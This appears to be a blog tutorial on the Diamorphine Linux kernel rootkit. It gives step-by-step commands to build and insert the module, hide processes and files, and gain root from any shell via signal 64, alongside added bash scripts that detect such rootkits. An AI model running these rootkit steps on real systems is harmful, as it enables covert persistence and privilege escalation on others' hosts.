This is how they do it ¯\_(ツ)_/¯

Whenever a hacker breaks into a system, there are a few steps they take to keep their access without being caught red-handed. The most durable of these is hiding in the kernel, below every tool a defender would normally use to look for them.

Hiding inside the kernel

Many rootkits have been written by very skilled hackers; today we will focus on one of them. My choice of weapon is Diamorphine, an LKM (Linux Kernel Module) rootkit.

The choice of weapon

Diamorphine works by hooking system calls. Once loaded, it locates the kernel's system call table, temporarily clears the write-protect bit in the CR0 register so that the read-only table can be modified, and replaces the entries for the calls it cares about: the directory-listing calls (getdents/getdents64), which it filters to hide files and processes, and kill, which it turns into a covert command channel. It also manipulates kernel objects directly, unlinking its own module structure from the kernel's module list and from sysfs so that it appears in neither /proc/modules nor /sys/module. Because all of this happens in kernel mode, every user-space tool (ps, ls, lsmod) sees only what the rootkit allows it to see, and there is no userland component left to find.

Let's get started

Verify that the kernel is of a compatible version (2.6.x / 3.x / 4.x at the time of writing; the project README lists the kernels it currently supports):

# uname -r
3.10.0-1160.45.1.el7.x86_64

Download, compile and insert the Diamorphine module into the kernel. Compiling needs gcc and the headers for the running kernel (on CentOS 7, the kernel-devel package matching uname -r), because the module is built against the exact kernel it will be inserted into.

# git clone https://github.com/m0nad/Diamorphine.git
# cd Diamorphine
# make && insmod diamorphine.ko

Verify Invisibility

The module hides itself as soon as it is loaded, but just to make sure, verify that it is truly gone from everything that enumerates loaded modules:

# cat /proc/modules | grep -i dia
# lsmod | grep -i dia
# kmod list | grep -i dia
# modinfo diamorphine
modinfo: ERROR: Module diamorphine not found.

The first three commands read the kernel's module list, which the rootkit has unlinked itself from, so they print nothing. The modinfo error proves less than it looks: modinfo searches /lib/modules/$(uname -r) by name, and a .ko inserted straight from a build directory was never installed there, hidden or not.
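A defender-side check, added here as an example (it is not from the original post or from the Diamorphine project): lsmod going quiet is the rootkit's doing, but two traces survive an unmodified Diamorphine. Inserting an out-of-tree module (and, on kernels built with module signing, an unsigned one) sets taint bits in /proc/sys/kernel/tainted, and the kernel logs the load. Diamorphine as published clears neither. The script decodes the module-related taint bits, greps the kernel log for the load messages, and cross-checks /proc/modules against /sys/module for less thorough rootkits. The function names are my own.

```bash
# Added example, not part of the original post or of the Diamorphine project.
# Evidence that an out-of-tree module was loaded survives the module hiding
# itself: insmod sets kernel taint bits and the kernel logs the load.

# Pure helper: given the integer from /proc/sys/kernel/tainted, print the
# module-related taint letters that are set: O (out-of-tree module, bit 12)
# and E (unsigned module, bit 13). Prints nothing if neither bit is set.
module_taint_flags() {
    local value="$1" flags=""
    if [ $(( (value >> 12) & 1 )) -eq 1 ]; then flags="O"; fi
    if [ $(( (value >> 13) & 1 )) -eq 1 ]; then flags="${flags:+$flags }E"; fi
    printf '%s' "$flags"
}

# Live check: returns 0 (and prints the letters) when the running kernel has
# been tainted by an out-of-tree or unsigned module, 1 when it has not,
# 2 when the taint file cannot be read.
kernel_tainted_by_module() {
    local value flags
    value=$(cat /proc/sys/kernel/tainted 2>/dev/null) || return 2
    flags=$(module_taint_flags "$value")
    [ -n "$flags" ] || return 1
    echo "tainted=$value flags=$flags"
    return 0
}

# Kernel log lines that inserting such a module leaves behind. These are
# standard kernel messages; a rootkit that does not scrub the ring buffer
# leaves them in place (reading dmesg may need root if dmesg_restrict=1).
module_load_log_lines() {
    dmesg 2>/dev/null | grep -E 'loading out-of-tree module taints kernel|module verification failed'
}

# Modules listed in /proc/modules but missing from /sys/module. Diamorphine
# removes itself from both, so this only catches rootkits that unlink the
# list entry and forget the sysfs object, but the two views should agree on
# a clean host. (/sys/module also holds built-in modules with parameters,
# so the reverse comparison is not meaningful.)
module_view_mismatch() {
    [ -r /proc/modules ] && [ -d /sys/module ] || return 2
    local name
    for name in $(cut -d' ' -f1 /proc/modules); do
        [ -d "/sys/module/$name" ] || echo "in /proc/modules only: $name"
    done
    return 0
}
```

Run `kernel_tainted_by_module; module_load_log_lines; module_view_mismatch` on a host you suspect. A kernel-mode rootkit could clear the taint mask and the ring buffer, so a clean result is weak evidence; a set O or E bit on a host that should have no out-of-tree modules is a strong lead worth following up with a memory image.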

Kernel Security is Breached

Now that the module is in place, we can start playing with the rootkit's functions. These are the defaults documented in the project README:

  • Hide/unhide any process by sending it signal 31 (the same signal toggles the state);
  • Sending signal 63 (to any pid) makes the module (in)visible;
  • Sending signal 64 (to any pid) makes the sending user root;
  • Files or directories whose names start with the MAGIC_PREFIX become invisible;

The rootkit's kill hook intercepts these three signal numbers and never delivers them. Without the module loaded they are ordinary signals (31 is SIGSYS on x86; 63 and 64 are real-time signals whose default action is to terminate the process), so don't send them to anything you care about on a clean host.

Hidden Processes

Go ahead, pick a number! Hide or unhide a process by issuing the following command (sending it again reverses the effect):

# kill -31 <your_process_number>

Verify that the process is hidden/unhidden:

# ps -eo pid,user,comm | grep -w <your_process_number>

A plain grep for the PID over ps waux would also match the grep process itself, whose command line contains the number; selecting the pid column and matching the whole word avoids that false positive. ps discovers processes by listing /proc, which is exactly the directory-listing call the rootkit filters, so a hidden process simply disappears from it. The process itself is untouched: its /proc/<pid> directory still exists and can still be reached by name, which is the discrepancy that detection tools look for.

Unhiding and Removing the Kernel Module

The hacker (or the victim) would simply do the following, as root, to remove the rootkit:

# kill -63 0
# rmmod diamorphine

The order matters: rmmod looks the module up in the kernel's module list, so while Diamorphine is hidden it reports that no such module is loaded. Signal 63 relinks the module first. Removing the module restores the original system calls, so hidden files and processes become visible again, but a shell that was already given root via signal 64 keeps its root credentials.

Keep in mind that a skilled hacker would not use the default MAGIC_PREFIX or signal numbers, as that would be a script-kiddie mistake; the values above only work against an unmodified build.

The hacker becomes the master

The hacker can become root from any unprivileged shell. It is the process that sends signal 64 that is given root credentials; the PID argument is ignored, and since the hook swallows the signal, nothing is actually delivered. Because kill is a bash builtin, the signal is sent by the shell itself, so the shell is root immediately afterwards (the sudo -i step below is not what grants the privilege). Note in the output that the supplementary group 1000(hacker) survives: the rootkit rewrites only the uid and gid fields of the shell's existing credentials.
Find your bash pid:

% ssh hacker@victim
[hacker@victim ~]$ id
uid=1000(hacker) gid=1000(hacker) groups=1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[hacker@victim ~]$ ps | grep bash
 1604 pts/1    00:00:00 bash

[hacker@victim ~]$ kill -64 1604
[hacker@victim ~]$ sudo -i
[hacker@victim ~]$ id
uid=0(root) gid=0(root) groups=0(root),1000(hacker) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

Invisible files and directories

So you might wonder what the MAGIC_PREFIX is. The default prefix is “diamorphine_secret”, a compile-time constant in diamorphine.h, and it applies to any file or directory whose name starts with it. Let's try it out:

# echo test > /tmp/diamorphine_secret_test
# cat /tmp/diamorphine_secret_test
test

# ls -lsa /tmp/dia*
ls: cannot access /tmp/dia*: No such file or directory

The file is there and readable by its full path, as the cat shows, because the rootkit does not touch open or stat. What it filters is the directory listing: the shell expands the glob by reading /tmp, never sees the name, and passes the literal pattern on to ls, which then fails. The same goes for ls on the directory, find, and any other tool that enumerates it.
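The hidden processes and the hidden files above share one weakness, and this added example (not from the original post or from the Diamorphine project) turns it into a check. Diamorphine filters the results of getdents/getdents64, the system call behind every directory listing (ls, ps, find, shell globs), but it leaves path lookups such as stat(2) and open(2) alone, which is why the cat by full path worked. So: enumerate by listing, probe by name, and report the difference. The function names are my own; the PID lists used in the tests are constructed.

```bash
# Added example, not part of the original post or of the Diamorphine project.
# Compare what a directory listing shows (filterable by a getdents hook) with
# what exists when looked up by name (not filterable), for PIDs and for files.

# PIDs as seen through a directory listing of /proc (filtered by the rootkit).
listed_pids() {
    ls /proc 2>/dev/null | grep -E '^[0-9]+$'
}

# PIDs 1..$1 whose /proc/<pid> directory exists when looked up by name
# (not filtered). Defaults to the kernel's pid_max, which can take a while
# in shell; pass a smaller bound for a quick scan.
probed_pids() {
    local max_pid="${1:-$(cat /proc/sys/kernel/pid_max 2>/dev/null || echo 32768)}"
    local pid=1
    while [ "$pid" -le "$max_pid" ]; do
        [ -d "/proc/$pid" ] && echo "$pid"
        pid=$((pid + 1))
    done
}

# Pure comparison (testable without a live system): print PIDs present in the
# probed list but absent from BOTH listings. The listings are taken before
# and after the probe so that processes that merely started or exited in the
# meantime are not reported. Arguments are whitespace-separated PID lists.
hidden_diff() {
    local before=" $(printf '%s ' $1)" after=" $(printf '%s ' $2)" pid
    for pid in $3; do
        case "$before" in *" $pid "*) continue ;; esac
        case "$after"  in *" $pid "*) continue ;; esac
        echo "$pid"
    done
}

# Live check: prints hidden PIDs and returns 1 if any are found, 0 if none,
# 2 if /proc is not available.
find_hidden_pids() {
    [ -d /proc/self ] || return 2
    local before probed after result
    before=$(listed_pids)
    probed=$(probed_pids "$1")
    after=$(listed_pids)
    result=$(hidden_diff "$before" "$after" "$probed")
    [ -z "$result" ] && return 0
    echo "$result"
    return 1
}

# Same idea for a file: given a path you know or suspect (from a log, a shell
# history, a config file), returns 0 if it exists by name but its parent
# directory listing does not show it, 1 if it is listed normally, 2 if the
# path does not exist at all.
is_hidden_from_listing() {
    local path="$1" dir base
    [ -e "$path" ] || return 2
    dir=$(dirname -- "$path")
    base=$(basename -- "$path")
    if ls -a -- "$dir" 2>/dev/null | grep -qxF -- "$base"; then
        return 1
    fi
    echo "exists but not listed: $path"
    return 0
}
```

On the victim above, `find_hidden_pids` would report the PID hidden with signal 31, and `is_hidden_from_listing /tmp/diamorphine_secret_test` would return 0. The file check needs a candidate name, since nothing can enumerate what the listing hides; the PID check does not, because the PID space is small enough to walk. Both rest on the rootkit hooking only the listing calls, so a rootkit that also hooks stat and open would defeat them.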